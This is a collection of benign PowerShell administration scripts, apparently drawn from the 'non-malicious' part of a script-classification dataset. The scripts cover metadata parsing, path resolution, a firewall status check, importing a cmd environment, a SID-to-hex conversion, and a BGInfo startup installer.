ValidateAndAdd-PSScriptInfoEntry -PSScriptInfo $PSScriptInfo ` -PropertyName $KeyName ` -PropertyValue $Value ` -CallerPSCmdlet $PSCmdlet } $KeyName = $null $Value = "" if ($parts.GetType().ToString() -eq "System.String") { $KeyName = $parts } else { $KeyName = $parts[0]; $Value = $parts[1] } } else { if ($Value) { $Value += '__NEWLINE__' } $Value += $line } } if ($KeyName -and $Value) { if ($keyName -eq $script:ReleaseNotes) { $Value = $Value.Trim() -split '__NEWLINE__' } elseif ($keyName -eq $script:DESCRIPTION) { $Value = $Value -split '__NEWLINE__' $Value = ($Value -join "`r`n").Trim() } else { $Value = $Value -split '__NEWLINE__' | Microsoft.PowerShell.Core\Where-Object { $_ } if ($Value -and $Value.GetType().ToString() -eq "System.String") { $Value = $Value.Trim() } } ValidateAndAdd-PSScriptInfoEntry -PSScriptInfo $PSScriptInfo ` -PropertyName $KeyName ` -PropertyValue $Value ` -CallerPSCmdlet $PSCmdlet $KeyName = $null $Value = "" } } $helpContent = $ast.GetHelpContent() if ($helpContent -and $helpContent.Description) { ValidateAndAdd-PSScriptInfoEntry -PSScriptInfo $PSScriptInfo ` -PropertyName $script:DESCRIPTION ` -PropertyValue $helpContent.Description.Trim() ` -CallerPSCmdlet $PSCmdlet } if ((Microsoft.PowerShell.Utility\Get-Member -InputObject $ast -Name 'ScriptRequirements') -and $ast.ScriptRequirements -and (Microsoft.PowerShell.Utility\Get-Member -InputObject $ast.ScriptRequirements -Name 'RequiredModules') -and $ast.ScriptRequirements.RequiredModules) { ValidateAndAdd-PSScriptInfoEntry -PSScriptInfo $PSScriptInfo ` -PropertyName $script:RequiredModules ` -PropertyValue $ast.ScriptRequirements.RequiredModules ` -CallerPSCmdlet $PSCmdlet } $allCommands = $ast.FindAll( { param($i) return ($i.GetType().Name -eq 'FunctionDefinitionAst') }, $true) if ($allCommands) { $allCommandNames = $allCommands | ForEach-Object { $_.Name } | Select-Object -Unique -ErrorAction Ignore ValidateAndAdd-PSScriptInfoEntry -PSScriptInfo $PSScriptInfo ` -PropertyName $script:DefinedCommands ` -PropertyValue $allCommandNames ` -CallerPSCmdlet $PSCmdlet $allFunctionNames = $allCommands | Where-Object { -not $_.IsWorkflow } | ForEach-Object { $_.Name } | Select-Object -Unique -ErrorAction Ignore ValidateAndAdd-PSScriptInfoEntry -PSScriptInfo $PSScriptInfo ` -PropertyName $script:DefinedFunctions ` -PropertyValue $allFunctionNames ` -CallerPSCmdlet $PSCmdlet $allWorkflowNames = $allCommands | Where-Object { $_.IsWorkflow } | ForEach-Object { $_.Name } | Select-Object -Unique -ErrorAction Ignore ValidateAndAdd-PSScriptInfoEntry -PSScriptInfo $PSScriptInfo ` -PropertyName $script:DefinedWorkflows ` -PropertyValue $allWorkflowNames ` -CallerPSCmdlet $PSCmdlet } } if (-not $PSScriptInfo.Version -or -not $PSScriptInfo.Guid -or -not $PSScriptInfo.Author -or -not $PSScriptInfo.Description) { $errorMessage = ($LocalizedData.MissingRequiredPSScriptInfoProperties -f $scriptFilePath) ThrowError -ExceptionName "System.ArgumentException" ` -ExceptionMessage $errorMessage ` -ErrorId "MissingRequiredPSScriptInfoProperties" ` -CallerPSCmdlet $PSCmdlet ` -ExceptionObject $Path ` -ErrorCategory InvalidArgument return } if ($PSScriptInfo.Version -match '-') { $result = ValidateAndGet-VersionPrereleaseStrings -Version $PSScriptInfo.Version -CallerPSCmdlet $PSCmdlet if (-not $result) { return } } $PSScriptInfo = Get-OrderedPSScriptInfoObject -PSScriptInfo $PSScriptInfo return $PSScriptInfo } }
combined_dataset/train/non-malicious/1265.ps1
1265.ps1
function Resolve-CFullPath { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [string] $Path ) Set-StrictMode -Version 'Latest' Use-CallerPreference -Cmdlet $PSCmdlet -Session $ExecutionContext.SessionState if( -not ( [System.IO.Path]::IsPathRooted($Path) ) ) { $Path = Join-Path (Get-Location) $Path } return [IO.Path]::GetFullPath($Path) } Set-Alias -Name 'ConvertTo-FullPath' -Value 'Resolve-CFullPath'
combined_dataset/train/non-malicious/Get-FirewallStatus.ps1
Get-FirewallStatus.ps1
# returns true if windows firewall is enabled, false if it is disabled filter global:get-firewallstatus ([string]$computer = $env:computername) { if ($_) { $computer = $_ } $HKLM = 2147483650 $reg = get-wmiobject -list -namespace root\\default -computer $computer | where-object { $_.name -eq "StdRegProv" } $firewallEnabled = $reg.GetDwordValue($HKLM, "System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile","EnableFirewall") [bool]($firewallEnabled.uValue) }
combined_dataset/train/non-malicious/Import-CmdEnvironment.ps1
Import-CmdEnvironment.ps1
# .SYNOPSIS # Import environment variables from cmd to PowerShell # .DESCRIPTION # Invoke the specified command (with parameters) in cmd.exe, and import any environment variable changes back to PowerShell # .EXAMPLE # Import-CmdEnvironment "C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\vcvarsall.bat" x86 # # Imports the x86 Visual Studio 2010 Command Tools environment # .EXAMPLE # Import-CmdEnvironment "C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\vcvarsall.bat" x86_amd64 # # Imports the x64 Cross Tools Visual Studio 2010 Command environment #function Import-CmdEnvironment { [CmdletBinding()] param( [Parameter(Position=0,Mandatory=$False,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [Alias("PSPath")] [string]$Command = "echo" , [Parameter(Position=0,Mandatory=$False,ValueFromRemainingArguments=$true,ValueFromPipelineByPropertyName=$true)] [string[]]$Parameters ) ## If it's an actual file, then we should quote it: if(Test-Path $Command) { $Command = "`"$(Resolve-Path $Command)`"" } $setRE = new-Object System.Text.RegularExpressions.Regex '^(?<var>.*?)=(?<val>.*)$', "Compiled,ExplicitCapture,MultiLine" $OFS = " " [string]$Parameters = $Parameters $OFS = "`n" ## Execute the command, with parameters. Write-Verbose "EXECUTING: cmd.exe /c `"$Command $Parameters > nul && set`"" ## For each line of output that matches, set the local environment variable foreach($match in $setRE.Matches((cmd.exe /c "$Command $Parameters > nul && set")) | Select Groups) { Set-Content Env:\\$($match.Groups["var"]) $match.Groups["val"] -Verbose } #}
combined_dataset/train/non-malicious/ConvertTo-Hex_3.ps1
ConvertTo-Hex_3.ps1
# Ported from C# technique found here: http://forums.asp.net/p/1298956/2529558.aspx param ( [string]$SidString ) # Create SID .NET object using SID string provided $sid = New-Object system.Security.Principal.SecurityIdentifier $sidstring # Create a byte array of the proper length $sidBytes = New-Object byte[] $sid.BinaryLength #Convert to bytes $sid.GetBinaryForm( $sidBytes, 0 ) # Iterate through bytes, converting each to the hexidecimal equivalent $hexArr = $sidBytes | ForEach-Object { $_.ToString("X2") } # Join the hex array into a single string for output $hexArr -join ''
combined_dataset/train/non-malicious/Install-Bginfo.ps1
Install-Bginfo.ps1
#Install and run BGInfo at startup using registry method as described here: #http://forum.sysinternals.com/bginfo-at-startup_topic2081.html #Setup #1. Download BgInfo http://technet.microsoft.com/en-us/sysinternals/bb897557 #2. Create a bginfo folder and copy bginfo.exe #3. Create a bginfo.bgi file by running bginfo.exe and saving a bginfo.bgi file and placing in same directory as bginfo if (Test-Path "C:\\WINDOWS\\system32\\bginfo") { remove-item -path "C:\\WINDOWS\\system32\\bginfo" -Recurse } #Change \\\\Z001\\d$\\sw\\bginfo to your SW distrib share copy-item \\\\Z001\\d$\\sw\\bginfo -Destination C:\\Windows\\system32 -Recurse Set-ItemProperty -path "HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" -name "BgInfo" -value "C:\\WINDOWS\\system32\\bginfo\\Bginfo.exe C:\\WINDOWS\\system32\\bginfo\\bginfo.bgi /TIMER:0 /NOLICPROMPT"
combined_dataset/train/non-malicious/New-Script.ps1
New-Script.ps1
## New-Script function ## Creates a new script from the most recent commands in history ################################################################################################## ## Example Usage: ## New-Script ScriptName 4 ## creates a script from the most recent four commands ## New-Script ScriptName -id 10,11,12,14 ## creates a script from the specified commands in history ## New-Script Clipboard 2 ## sends the most recent two commands to the clipboard ################################################################################################## ## As a tip, I use a prompt function something like this to get the ID into the prompt: ## ## function prompt { ## return "`[{0}]: " -f ((get-history -count 1).Id + 1) ## } ################################################################################################## #function New-Script { param( [string]$script=(Read-Host "A name for your script"), [int]$count=1, [int]$id=((Get-History -count 1| Select Id).Id) ) if($script -eq "clipboard") { if( @(Get-PSSnapin -Name "pscx").Count ) { Get-History -count $count -id $id | &{process{ $_.CommandLine }} | out-clipboard }elseif(@(gcm clip.exe).Count) { Get-History -count $count -id $id | &{process{ $_.CommandLine }} | clip } } else { # default to putting it in my "Windows PowerShell\\scripts" folder which I have in my path... $folder = Split-Path $script if(!$folder) { $folder = Join-Path (Split-Path $Profile) "Scripts" } if(!(Test-Path $folder)) { Throw (new-object System.IO.DirectoryNotFoundException "Cannot find path '$folder' because it does not exist.") } # add the ps1 extension if it's not already there ... $file = Join-Path $folder (Split-Path $script -leaf) if(!(([IO.FileInfo]$file).Extension)) { $file = "$file.ps1" } Get-History -count $count -id $id | &{process{ $_.CommandLine }} | set-content $file } #}
combined_dataset/train/non-malicious/4365.ps1
4365.ps1
function Get-SourceName { [CmdletBinding()] [OutputType("string")] Param ( [Parameter(Mandatory = $true)] [ValidateNotNullOrEmpty()] [string] $Location ) Set-ModuleSourcesVariable foreach ($psModuleSource in $script:PSGetModuleSources.Values) { if (($psModuleSource.Name -eq $Location) -or (Test-EquivalentLocation -LocationA $psModuleSource.SourceLocation -LocationB $Location) -or ((Get-Member -InputObject $psModuleSource -Name $script:ScriptSourceLocation) -and (Test-EquivalentLocation -LocationA $psModuleSource.ScriptSourceLocation -LocationB $Location))) { return $psModuleSource.Name } } }
combined_dataset/train/non-malicious/sample_7_84.ps1
sample_7_84.ps1
ConvertFrom-StringData @' id_windowssearchlenovorapidbootcheck_st=The Windows Search service is stopped and the HyperW7Svc64.exe service was detected '@ # SIG # Begin signature block # MIIoUgYJKoZIhvcNAQcCoIIoQzCCKD8CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBoiJgSjlRBHEmH # 2vuWniD1mItVtr0ChyBmSrv+Z3+MyaCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIJ63 # zZ8ATyITQSvzC8QmcTLaOAAXJjzukmEDOekracPbMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAi08grAT5jly24RNbNBQnJJPLpHOPoZN6DvYT # PAHV1sc+kEJ34BbqMCx1SsHsPbfSrev1mj36EDBbFpSM4GJk13+uFz1NgQ9ud1ol # aTcc7PwDzmQmkzD/aEyCe2aemMgA69t/SiRIsjmlfcWBH2ntfHSUl9/xJ0dKf9y8 # 3wHbSllfU4ecS/R6LpiAqYhoj6HAQceklzJQU2CwFGaNchV+2PBG9OzWxlRUnhMD # e3OqZ0jJYnN3rByJdoNgp4QGySkHIpTuQ5Dc7OIPmGns2ERB0HGew8aWliGfTahd # Rm05PB65oo1DYnN8YMkpW9H1lcX9vAOcbtmQup/vop44tgagcaGCF60wghepBgor # BgEEAYI3AwMBMYIXmTCCF5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBO9pUJxvikUu+A4FRLtaWmIeYFxoZBTW/P # gjUG6kqYPwIGZusxcv6wGBMyMDI0MTAxNzAwMjMyMi42NjJaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjoyRDFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAAB/XP5 # aFrNDGHtAAEAAAH9MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzExNloXDTI1MTAyMjE4MzExNlowgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjJEMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # oWWs+D+Ou4JjYnRHRedu0MTFYzNJEVPnILzc02R3qbnujvhZgkhp+p/lymYLzkQy # G2zpxYceTjIF7HiQWbt6FW3ARkBrthJUz05ZnKpcF31lpUEb8gUXiD2xIpo8YM+S # D0S+hTP1TCA/we38yZ3BEtmZtcVnaLRp/Avsqg+5KI0Kw6TDJpKwTLl0VW0/23sK # ikeWDSnHQeTprO0zIm/btagSYm3V/8zXlfxy7s/EVFdSglHGsUq8EZupUO8XbHzz # 7tURyiD3kOxNnw5ox1eZX/c/XmW4H6b4yNmZF0wTZuw37yA1PJKOySSrXrWEh+H6 # ++Wb6+1ltMCPoMJHUtPP3Cn0CNcNvrPyJtDacqjnITrLzrsHdOLqjsH229Zkvndk # 0IqxBDZgMoY+Ef7ffFRP2pPkrF1F9IcBkYz8hL+QjX+u4y4Uqq4UtT7VRnsqvR/x # /+QLE0pcSEh/XE1w1fcp6Jmq8RnHEXikycMLN/a/KYxpSP3FfFbLZuf+qIryFL0g # EDytapGn1ONjVkiKpVP2uqVIYj4ViCjy5pLUceMeqiKgYqhpmUHCE2WssLLhdQBH # dpl28+k+ZY6m4dPFnEoGcJHuMcIZnw4cOwixojROr+Nq71cJj7Q4L0XwPvuTHQt0 # oH7RKMQgmsy7CVD7v55dOhdHXdYsyO69dAdK+nWlyYcCAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBTpDMXA4ZW8+yL2+3vA6RmU7oEKpDAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAY9hYX+T5AmCrYGaH96TdR5T52/PNOG7ySYeopv4flnDWQLhBlravAg+p # jlNv5XSXZrKGv8e4s5dJ5WdhfC9ywFQq4TmXnUevPXtlubZk+02BXK6/23hM0TSK # s2KlhYiqzbRe8QbMfKXEDtvMoHSZT7r+wI2IgjYQwka+3P9VXgERwu46/czz8IR/ # Zq+vO5523Jld6ssVuzs9uwIrJhfcYBj50mXWRBcMhzajLjWDgcih0DuykPcBpoTL # lOL8LpXooqnr+QLYE4BpUep3JySMYfPz2hfOL3g02WEfsOxp8ANbcdiqM31dm3vS # heEkmjHA2zuM+Tgn4j5n+Any7IODYQkIrNVhLdML09eu1dIPhp24lFtnWTYNaFTO # fMqFa3Ab8KDKicmp0AthRNZVg0BPAL58+B0UcoBGKzS9jscwOTu1JmNlisOKkVUV # kSJ5Fo/ctfDSPdCTVaIXXF7l40k1cM/X2O0JdAS97T78lYjtw/PybuzX5shxBh/R # qTPvCyAhIxBVKfN/hfs4CIoFaqWJ0r/8SB1CGsyyIcPfEgMo8ceq1w5Zo0JfnyFi # 6Guo+z3LPFl/exQaRubErsAUTfyBY5/5liyvjAgyDYnEB8vHO7c7Fg2tGd5hGgYs # +AOoWx24+XcyxpUkAajDhky9Dl+8JZTjts6BcT9sYTmOodk/SgIwggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # 